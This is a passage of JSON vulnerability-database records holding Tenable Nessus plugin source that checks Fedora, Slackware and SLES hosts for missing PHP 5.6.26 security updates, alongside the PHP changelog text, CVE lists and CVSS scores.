sp:\"2\", reference:\"php53-ldap-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-mbstring-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-mcrypt-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-mysql-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-odbc-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-openssl-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pcntl-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pdo-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pear-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pgsql-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pspell-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-shmop-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-snmp-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-soap-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-suhosin-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-sysvmsg-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-sysvsem-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-sysvshm-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-tokenizer-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-wddx-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-xmlreader-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-xmlrpc-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-xmlwriter-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-xsl-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-zip-5.3.17-58.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-zlib-5.3.17-58.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:04", "description": "15 Sep 2016 **PHP version 5.6.26**\n\n**Core:**\n\n - Fixed bug php#72907 (NULL pointer deref, segfault in gc_remove_zval_from_buffer (zend_gc.c:260)). (Laruence)\n\n**Dba:**\n\n - Fixed bug php#71514 (Bad dba_replace condition because of wrong API usage). (cmb)\n\n - Fixed bug php#70825 (Cannot fetch multiple values with group in ini file). (cmb)\n\n**EXIF:**\n\n - Fixed bug php#72926 (Uninitialized Thumbail Data Leads To Memory Leakage in exif_process_IFD_in_TIFF). (Stas)\n\n**FTP:**\n\n - Fixed bug php#70195 (Cannot upload file using ftp_put to FTPES with require_ssl_reuse). (Benedict Singer)\n\n**GD:**\n\n - Fixed bug php#66005 (imagecopy does not support 1bit transparency on truecolor images). (cmb)\n\n - Fixed bug php#72913 (imagecopy() loses single-color transparency on palette images). (cmb)\n\n - Fixed bug php#68716 (possible resource leaks in\n _php_image_convert()). (cmb)\n\n**Intl:**\n\n - Fixed bug php#73007 (add locale length check). (Stas)\n\n**JSON:**\n\n - Fixed bug php#72787 (json_decode reads out of bounds).\n (Jakub Zelenka)\n\n**mbstring:**\n\n - Fixed bug php#66797 (mb_substr only takes 32-bit signed integer). (cmb)\n\n - Fixed bug php#72910 (Out of bounds heap read in mbc_to_code() / triggered by mb_ereg_match()). (Stas)\n\n**MSSQL:**\n\n - Fixed bug php#72039 (Use of uninitialised value on mssql_guid_string). (Kalle)\n\n**Mysqlnd:**\n\n - Fixed bug php#72293 (Heap overflow in mysqlnd related to BIT fields). (Stas)\n\n**Phar:**\n\n - Fixed bug php#72928 (Out of bound when verify signature of zip phar in phar_parse_zipfile). (Stas)\n\n - Fixed bug php#73035 (Out of bound when verify signature of tar phar in phar_parse_tarfile). (Stas)\n\n**PDO:**\n\n - Fixed bug php#60665 (call to empty() on NULL result using PDO::FETCH_LAZY returns false). (cmb)\n\n**PDO_pgsql:**\n\n - Implemented FR php#72633 (Postgres PDO lastInsertId() should work without specifying a sequence). (Pablo Santiago S&aacute;nchez, Matteo)\n\n - Fixed bug php#72759 (Regression in pgo_pgsql). (Anatol)\n\n**SPL:**\n\n - Fixed bug php#73029 (Missing type check when unserializing SplArray). (Stas)\n\n**Standard:**\n\n - Fixed bug php#72823 (strtr out-of-bound access). (cmb)\n\n - Fixed bug php#72278 (getimagesize returning FALSE on valid jpg). (cmb)\n\n - Fixed bug php#65550 (get_browser() incorrectly parses entries with '+' sign). (cmb)\n\n - Fixed bug php#71882 (Negative ftruncate() on php://memory exhausts memory). (cmb)\n\n - Fixed bug php#73011 (integer overflow in fgets cause heap corruption). (Stas)\n\n - Fixed bug php#73017 (memory corruption in wordwrap function). (Stas)\n\n - Fixed bug php#73045 (integer overflow in fgetcsv caused heap corruption). (Stas)\n\n - Fixed bug php#73052 (Memory Corruption in During Deserialized-object Destruction) (Stas)\n\n**Streams:**\n\n - Fixed bug php#72853 (stream_set_blocking doesn't work).\n (Laruence)\n\n**Wddx:**\n\n - Fixed bug php#72860 (wddx_deserialize use-after-free).\n (Stas)\n\n - Fixed bug php#73065 (Out-Of-Bounds Read in php_wddx_push_element). (Stas)\n\n**XML:**\n\n - Fixed bug php#72085 (SEGV on unknown address zif_xml_parse). (cmb)\n\n - Fixed bug php#72927 (integer overflow in xml_utf8_encode). (Stas)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-09-28T00:00:00", "type": "nessus", "title": "Fedora 23 : php (2016-db71b72137)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-DB71B72137.NASL", "href": "https://www.tenable.com/plugins/nessus/93754", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-db71b72137.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93754);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_xref(name:\"FEDORA\", value:\"2016-db71b72137\");\n\n script_name(english:\"Fedora 23 : php (2016-db71b72137)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"15 Sep 2016 **PHP version 5.6.26**\n\n**Core:**\n\n - Fixed bug php#72907 (NULL pointer deref, segfault in\n gc_remove_zval_from_buffer (zend_gc.c:260)). (Laruence)\n\n**Dba:**\n\n - Fixed bug php#71514 (Bad dba_replace condition because\n of wrong API usage). (cmb)\n\n - Fixed bug php#70825 (Cannot fetch multiple values with\n group in ini file). (cmb)\n\n**EXIF:**\n\n - Fixed bug php#72926 (Uninitialized Thumbail Data Leads\n To Memory Leakage in exif_process_IFD_in_TIFF). (Stas)\n\n**FTP:**\n\n - Fixed bug php#70195 (Cannot upload file using ftp_put to\n FTPES with require_ssl_reuse). (Benedict Singer)\n\n**GD:**\n\n - Fixed bug php#66005 (imagecopy does not support 1bit\n transparency on truecolor images). (cmb)\n\n - Fixed bug php#72913 (imagecopy() loses single-color\n transparency on palette images). (cmb)\n\n - Fixed bug php#68716 (possible resource leaks in\n _php_image_convert()). (cmb)\n\n**Intl:**\n\n - Fixed bug php#73007 (add locale length check). (Stas)\n\n**JSON:**\n\n - Fixed bug php#72787 (json_decode reads out of bounds).\n (Jakub Zelenka)\n\n**mbstring:**\n\n - Fixed bug php#66797 (mb_substr only takes 32-bit signed\n integer). (cmb)\n\n - Fixed bug php#72910 (Out of bounds heap read in\n mbc_to_code() / triggered by mb_ereg_match()). (Stas)\n\n**MSSQL:**\n\n - Fixed bug php#72039 (Use of uninitialised value on\n mssql_guid_string). (Kalle)\n\n**Mysqlnd:**\n\n - Fixed bug php#72293 (Heap overflow in mysqlnd related to\n BIT fields). (Stas)\n\n**Phar:**\n\n - Fixed bug php#72928 (Out of bound when verify signature\n of zip phar in phar_parse_zipfile). (Stas)\n\n - Fixed bug php#73035 (Out of bound when verify signature\n of tar phar in phar_parse_tarfile). (Stas)\n\n**PDO:**\n\n - Fixed bug php#60665 (call to empty() on NULL result\n using PDO::FETCH_LAZY returns false). (cmb)\n\n**PDO_pgsql:**\n\n - Implemented FR php#72633 (Postgres PDO lastInsertId()\n should work without specifying a sequence). (Pablo\n Santiago S&aacute;nchez, Matteo)\n\n - Fixed bug php#72759 (Regression in pgo_pgsql). (Anatol)\n\n**SPL:**\n\n - Fixed bug php#73029 (Missing type check when\n unserializing SplArray). (Stas)\n\n**Standard:**\n\n - Fixed bug php#72823 (strtr out-of-bound access). (cmb)\n\n - Fixed bug php#72278 (getimagesize returning FALSE on\n valid jpg). (cmb)\n\n - Fixed bug php#65550 (get_browser() incorrectly parses\n entries with '+' sign). (cmb)\n\n - Fixed bug php#71882 (Negative ftruncate() on\n php://memory exhausts memory). (cmb)\n\n - Fixed bug php#73011 (integer overflow in fgets cause\n heap corruption). (Stas)\n\n - Fixed bug php#73017 (memory corruption in wordwrap\n function). (Stas)\n\n - Fixed bug php#73045 (integer overflow in fgetcsv caused\n heap corruption). (Stas)\n\n - Fixed bug php#73052 (Memory Corruption in During\n Deserialized-object Destruction) (Stas)\n\n**Streams:**\n\n - Fixed bug php#72853 (stream_set_blocking doesn't work).\n (Laruence)\n\n**Wddx:**\n\n - Fixed bug php#72860 (wddx_deserialize use-after-free).\n (Stas)\n\n - Fixed bug php#73065 (Out-Of-Bounds Read in\n php_wddx_push_element). (Stas)\n\n**XML:**\n\n - Fixed bug php#72085 (SEGV on unknown address\n zif_xml_parse). (cmb)\n\n - Fixed bug php#72927 (integer overflow in\n xml_utf8_encode). (Stas)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-db71b72137\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"php-5.6.26-1.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:27:56", "description": "New php packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.", "cvss3": {}, "published": "2016-09-26T00:00:00", "type": "nessus", "title": "Slackware 14.0 / 14.1 / 14.2 / current : php (SSA:2016-267-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:php", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2016-267-01.NASL", "href": "https://www.tenable.com/plugins/nessus/93687", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-267-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93687);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_xref(name:\"SSA\", value:\"2016-267-01\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : php (SSA:2016-267-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.449886\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?39115ff5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"php\", pkgver:\"5.6.26\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.26\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"php\", pkgver:\"5.6.26\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.26\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"php\", pkgver:\"5.6.26\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.26\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"5.6.26\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.26\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:04", "description": "15 Sep 2016 **PHP version 5.6.26**\n\n**Core:**\n\n - Fixed bug php#72907 (NULL pointer deref, segfault in gc_remove_zval_from_buffer (zend_gc.c:260)). (Laruence)\n\n**Dba:**\n\n - Fixed bug php#71514 (Bad dba_replace condition because of wrong API usage). (cmb)\n\n - Fixed bug php#70825 (Cannot fetch multiple values with group in ini file). (cmb)\n\n**EXIF:**\n\n - Fixed bug php#72926 (Uninitialized Thumbail Data Leads To Memory Leakage in exif_process_IFD_in_TIFF). (Stas)\n\n**FTP:**\n\n - Fixed bug php#70195 (Cannot upload file using ftp_put to FTPES with require_ssl_reuse). (Benedict Singer)\n\n**GD:**\n\n - Fixed bug php#66005 (imagecopy does not support 1bit transparency on truecolor images). (cmb)\n\n - Fixed bug php#72913 (imagecopy() loses single-color transparency on palette images). (cmb)\n\n - Fixed bug php#68716 (possible resource leaks in\n _php_image_convert()). (cmb)\n\n**Intl:**\n\n - Fixed bug php#73007 (add locale length check). (Stas)\n\n**JSON:**\n\n - Fixed bug php#72787 (json_decode reads out of bounds).\n (Jakub Zelenka)\n\n**mbstring:**\n\n - Fixed bug php#66797 (mb_substr only takes 32-bit signed integer). (cmb)\n\n - Fixed bug php#72910 (Out of bounds heap read in mbc_to_code() / triggered by mb_ereg_match()). (Stas)\n\n**MSSQL:**\n\n - Fixed bug php#72039 (Use of uninitialised value on mssql_guid_string). (Kalle)\n\n**Mysqlnd:**\n\n - Fixed bug php#72293 (Heap overflow in mysqlnd related to BIT fields). (Stas)\n\n**Phar:**\n\n - Fixed bug php#72928 (Out of bound when verify signature of zip phar in phar_parse_zipfile). (Stas)\n\n - Fixed bug php#73035 (Out of bound when verify signature of tar phar in phar_parse_tarfile). (Stas)\n\n**PDO:**\n\n - Fixed bug php#60665 (call to empty() on NULL result using PDO::FETCH_LAZY returns false). (cmb)\n\n**PDO_pgsql:**\n\n - Implemented FR php#72633 (Postgres PDO lastInsertId() should work without specifying a sequence). (Pablo Santiago S&aacute;nchez, Matteo)\n\n - Fixed bug php#72759 (Regression in pgo_pgsql). (Anatol)\n\n**SPL:**\n\n - Fixed bug php#73029 (Missing type check when unserializing SplArray). (Stas)\n\n**Standard:**\n\n - Fixed bug php#72823 (strtr out-of-bound access). (cmb)\n\n - Fixed bug php#72278 (getimagesize returning FALSE on valid jpg). (cmb)\n\n - Fixed bug php#65550 (get_browser() incorrectly parses entries with '+' sign). (cmb)\n\n - Fixed bug php#71882 (Negative ftruncate() on php://memory exhausts memory). (cmb)\n\n - Fixed bug php#73011 (integer overflow in fgets cause heap corruption). (Stas)\n\n - Fixed bug php#73017 (memory corruption in wordwrap function). (Stas)\n\n - Fixed bug php#73045 (integer overflow in fgetcsv caused heap corruption). (Stas)\n\n - Fixed bug php#73052 (Memory Corruption in During Deserialized-object Destruction) (Stas)\n\n**Streams:**\n\n - Fixed bug php#72853 (stream_set_blocking doesn't work).\n (Laruence)\n\n**Wddx:**\n\n - Fixed bug php#72860 (wddx_deserialize use-after-free).\n (Stas)\n\n - Fixed bug php#73065 (Out-Of-Bounds Read in php_wddx_push_element). (Stas)\n\n**XML:**\n\n - Fixed bug php#72085 (SEGV on unknown address zif_xml_parse). (cmb)\n\n - Fixed bug php#72927 (integer overflow in xml_utf8_encode). (Stas)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-09-27T00:00:00", "type": "nessus", "title": "Fedora 24 : php (2016-62fc05fd68)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-62FC05FD68.NASL", "href": "https://www.tenable.com/plugins/nessus/93726", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-62fc05fd68.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93726);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_xref(name:\"FEDORA\", value:\"2016-62fc05fd68\");\n\n script_name(english:\"Fedora 24 : php (2016-62fc05fd68)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"15 Sep 2016 **PHP version 5.6.26**\n\n**Core:**\n\n - Fixed bug php#72907 (NULL pointer deref, segfault in\n gc_remove_zval_from_buffer (zend_gc.c:260)). (Laruence)\n\n**Dba:**\n\n - Fixed bug php#71514 (Bad dba_replace condition because\n of wrong API usage). (cmb)\n\n - Fixed bug php#70825 (Cannot fetch multiple values with\n group in ini file). (cmb)\n\n**EXIF:**\n\n - Fixed bug php#72926 (Uninitialized Thumbail Data Leads\n To Memory Leakage in exif_process_IFD_in_TIFF). (Stas)\n\n**FTP:**\n\n - Fixed bug php#70195 (Cannot upload file using ftp_put to\n FTPES with require_ssl_reuse). (Benedict Singer)\n\n**GD:**\n\n - Fixed bug php#66005 (imagecopy does not support 1bit\n transparency on truecolor images). (cmb)\n\n - Fixed bug php#72913 (imagecopy() loses single-color\n transparency on palette images). (cmb)\n\n - Fixed bug php#68716 (possible resource leaks in\n _php_image_convert()). (cmb)\n\n**Intl:**\n\n - Fixed bug php#73007 (add locale length check). (Stas)\n\n**JSON:**\n\n - Fixed bug php#72787 (json_decode reads out of bounds).\n (Jakub Zelenka)\n\n**mbstring:**\n\n - Fixed bug php#66797 (mb_substr only takes 32-bit signed\n integer). (cmb)\n\n - Fixed bug php#72910 (Out of bounds heap read in\n mbc_to_code() / triggered by mb_ereg_match()). (Stas)\n\n**MSSQL:**\n\n - Fixed bug php#72039 (Use of uninitialised value on\n mssql_guid_string). (Kalle)\n\n**Mysqlnd:**\n\n - Fixed bug php#72293 (Heap overflow in mysqlnd related to\n BIT fields). (Stas)\n\n**Phar:**\n\n - Fixed bug php#72928 (Out of bound when verify signature\n of zip phar in phar_parse_zipfile). (Stas)\n\n - Fixed bug php#73035 (Out of bound when verify signature\n of tar phar in phar_parse_tarfile). (Stas)\n\n**PDO:**\n\n - Fixed bug php#60665 (call to empty() on NULL result\n using PDO::FETCH_LAZY returns false). (cmb)\n\n**PDO_pgsql:**\n\n - Implemented FR php#72633 (Postgres PDO lastInsertId()\n should work without specifying a sequence). (Pablo\n Santiago S&aacute;nchez, Matteo)\n\n - Fixed bug php#72759 (Regression in pgo_pgsql). (Anatol)\n\n**SPL:**\n\n - Fixed bug php#73029 (Missing type check when\n unserializing SplArray). (Stas)\n\n**Standard:**\n\n - Fixed bug php#72823 (strtr out-of-bound access). (cmb)\n\n - Fixed bug php#72278 (getimagesize returning FALSE on\n valid jpg). (cmb)\n\n - Fixed bug php#65550 (get_browser() incorrectly parses\n entries with '+' sign). (cmb)\n\n - Fixed bug php#71882 (Negative ftruncate() on\n php://memory exhausts memory). (cmb)\n\n - Fixed bug php#73011 (integer overflow in fgets cause\n heap corruption). (Stas)\n\n - Fixed bug php#73017 (memory corruption in wordwrap\n function). (Stas)\n\n - Fixed bug php#73045 (integer overflow in fgetcsv caused\n heap corruption). (Stas)\n\n - Fixed bug php#73052 (Memory Corruption in During\n Deserialized-object Destruction) (Stas)\n\n**Streams:**\n\n - Fixed bug php#72853 (stream_set_blocking doesn't work).\n (Laruence)\n\n**Wddx:**\n\n - Fixed bug php#72860 (wddx_deserialize use-after-free).\n (Stas)\n\n - Fixed bug php#73065 (Out-Of-Bounds Read in\n php_wddx_push_element). (Stas)\n\n**XML:**\n\n - Fixed bug php#72085 (SEGV on unknown address\n zif_xml_parse). (cmb)\n\n - Fixed bug php#72927 (integer overflow in\n xml_utf8_encode). (Stas)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-62fc05fd68\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 